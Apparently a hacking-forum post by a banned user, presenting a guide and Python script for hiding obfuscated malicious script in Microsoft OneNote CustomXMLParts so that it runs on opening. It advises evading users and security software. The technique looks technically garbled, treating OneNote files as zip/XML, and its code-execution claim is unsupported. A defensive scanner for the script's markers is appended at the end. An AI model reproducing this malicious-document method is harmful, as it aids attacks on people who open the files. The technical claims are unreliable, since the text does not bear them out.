
Article: Exploiting CustomXMLParts in Microsoft OneNote: An Innovative Approach to Code Execution

miamoder

ripper
SCAMMER
Registered
11.06.2023
Messages
14
Reactions
10
Please note that this user is banned
Code:
Introduction:
In this article, we delve into the intriguing realm of CustomXMLParts in Microsoft OneNote files. We explore an innovative approach to embedding malicious code within CustomXMLParts, aiming for unauthorized code execution upon opening the OneNote file. Please note that this writeup is for educational purposes only, and any misuse or unethical behavior is strongly discouraged.

Section 1: Understanding CustomXMLParts
To comprehend the exploitation technique, we must first understand what CustomXMLParts are. CustomXMLParts are sections within OneNote files that allow users to store custom XML data. They offer great flexibility and can be manipulated to execute arbitrary code.

Section 2: Crafting the Malicious Script
To successfully exploit CustomXMLParts, we need to create a malicious script cleverly concealed within the OneNote file. We choose a scripting language like JavaScript or VBScript to develop the code, making sure it targets known or undisclosed vulnerabilities in OneNote or related applications. Obfuscation techniques such as variable renaming, string encryption, or Base64 encoding can be used to hide the script's true intentions.

Section 3: Manipulating the OneNote File Structure
In this section, we manipulate the structure of the OneNote file to ensure our malicious code is executed upon opening. The following steps outline this process:

Step 1: Extracting the OneNote File
Using a library like `zipfile`, we extract the contents of the OneNote file, revealing its internal structure.

Step 2: Creating the CustomXMLPart
We create a CustomXMLPart and embed our obfuscated malicious code within it. Careful consideration should be given to make the code appear innocuous and evade detection by unsuspecting users or security software.

Step 3: Modifying the OneNote File
Locate the relevant .one or .onetoc2 files within the extracted contents and modify them to reference the CustomXMLPart containing the malicious code. This step ensures that the script is executed when the OneNote file is opened.

Step 4: Saving the Modified OneNote File
Save the modified OneNote file, preserving the original file structure, using the `zipfile` library. This ensures that the changes made to the file structure are retained.

Section 4: Implementing the Python Script
To automate the process described above, we present an advanced Python script. This script utilizes libraries like `zipfile` and `xml.etree.ElementTree` to manipulate the OneNote file and CustomXMLParts. It automates the extraction, modification, and embedding of the malicious script, enabling quick execution of the technique.

Conclusion:
The exploitation of CustomXMLParts in Microsoft OneNote files opens up a world of possibilities for executing code within a seemingly innocent document. By following the steps outlined in this article, one can embed a concealed malicious script and manipulate the OneNote file structure to achieve unauthorized code execution. However, it is crucial to remember that this information is purely for educational purposes. Responsible and ethical use of technology is paramount, and any misuse can have severe consequences.
Python:
import os
import shutil
import zipfile
import xml.etree.ElementTree as ET

onenote_path = "path/to/onenote/file.onepkg"

xml_schema_path = "path/to/customXML/schema.xsd"

malicious_code = "print('Hello xss!')"

modified_file_path = "path/to/save/modified/onenote/file.onepkg"

# Unpack the package into a working directory
with zipfile.ZipFile(onenote_path, "r") as onenote_zip:
    onenote_zip.extractall("temp/")

# Build the CustomXMLPart that carries the script inside a CDATA section
customxml_data = f"""<?xml version="1.0"?>
<?mso-application progid="OneNote.FilenameTemplate"?>

<myXML xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/office/onenote/2013/onenote">
    <script>
        <![CDATA[
            {malicious_code}
        ]]>
    </script>
</myXML>
"""
root = ET.fromstring(customxml_data)
root.set('schema', xml_schema_path)
xml_data = ET.tostring(root, encoding='UTF-8', method='xml')

# Reference the CustomXMLPart from every .one / .onetoc2 entry
for foldername, subfolders, filenames in os.walk("temp/"):
    for filename in filenames:
        if filename.endswith(".one") or filename.endswith(".onetoc2"):
            filepath = os.path.join(foldername, filename)
            with open(filepath, "r", encoding="UTF-8") as f:
                filedata = f.read()
            filedata = filedata.replace('</one:Page>', '<one:InsertedFile path="file:///temp/customxml.xml" /></one:Page>')
            with open(filepath, "w", encoding="UTF-8") as f:
                f.write(filedata)

# Repack the working directory together with the new CustomXMLPart
with zipfile.ZipFile(modified_file_path, "w") as modified_zip:
    for foldername, subfolders, filenames in os.walk("temp/"):
        for filename in filenames:
            filepath = os.path.join(foldername, filename)
            modified_zip.write(filepath, arcname=filepath.replace("temp/", ""))

    modified_zip.writestr("temp/customxml.xml", xml_data)

# Replace the original package with the modified one and remove the working directory
os.replace(modified_file_path, onenote_path)
shutil.rmtree("temp/")
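The script above leaves two textual markers in the package it produces: a CustomXML part containing a `<script>` element with an inline CDATA payload, and an `<one:InsertedFile path="file:///...">` reference patched into the `.one`/`.onetoc2` entries. The following detection example is added here and is not from the post; it scans a zip-packaged file for exactly those markers, using a constructed in-memory sample package in place of a real file.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Marker the post's script injects before </one:Page> (pattern derived from its replace() call)
INSERTED_FILE_RE = re.compile(rb'<one:InsertedFile\s+path="file:///[^"]*"')

def local_name(tag):
    """Strip the {namespace} prefix ElementTree puts on tags."""
    return tag.rsplit("}", 1)[-1]

def scan_package_bytes(data):
    """Return (entry_name, reason) findings for a zip-packaged OneNote file given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            name = info.filename
            blob = z.read(name)
            if name.lower().endswith(".xml"):
                try:
                    root = ET.fromstring(blob)
                except ET.ParseError:
                    findings.append((name, "unparseable XML part"))
                    continue
                # Any <script> element carrying non-empty text is flagged, whatever its namespace
                for el in root.iter():
                    if local_name(el.tag) == "script" and (el.text or "").strip():
                        findings.append((name, "script element with inline payload"))
                        break
            elif name.lower().endswith((".one", ".onetoc2")):
                if INSERTED_FILE_RE.search(blob):
                    findings.append((name, "InsertedFile reference to a local file path"))
    return findings

def build_sample_package():
    """Constructed sample shaped like the post's output; not a real OneNote package."""
    custom_xml = (b'<?xml version="1.0"?>\n'
                  b'<?mso-application progid="OneNote.FilenameTemplate"?>\n'
                  b'<myXML xmlns="http://schemas.microsoft.com/office/onenote/2013/onenote">\n'
                  b"  <script><![CDATA[print('sample')]]></script>\n</myXML>")
    page = b'<one:Page><one:InsertedFile path="file:///temp/customxml.xml" /></one:Page>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("temp/customxml.xml", custom_xml)
        z.writestr("Notebook/Section.one", page)
        z.writestr("clean.xml", b"<a><b>ok</b></a>")  # benign part, must not be flagged
    return buf.getvalue()

if __name__ == "__main__":
    for entry, reason in scan_package_bytes(build_sample_package()):
        print(f"{entry}: {reason}")
```

For untrusted input in production, parse with a hardened XML parser rather than the standard library module, since a crafted part can otherwise trigger entity-expansion issues.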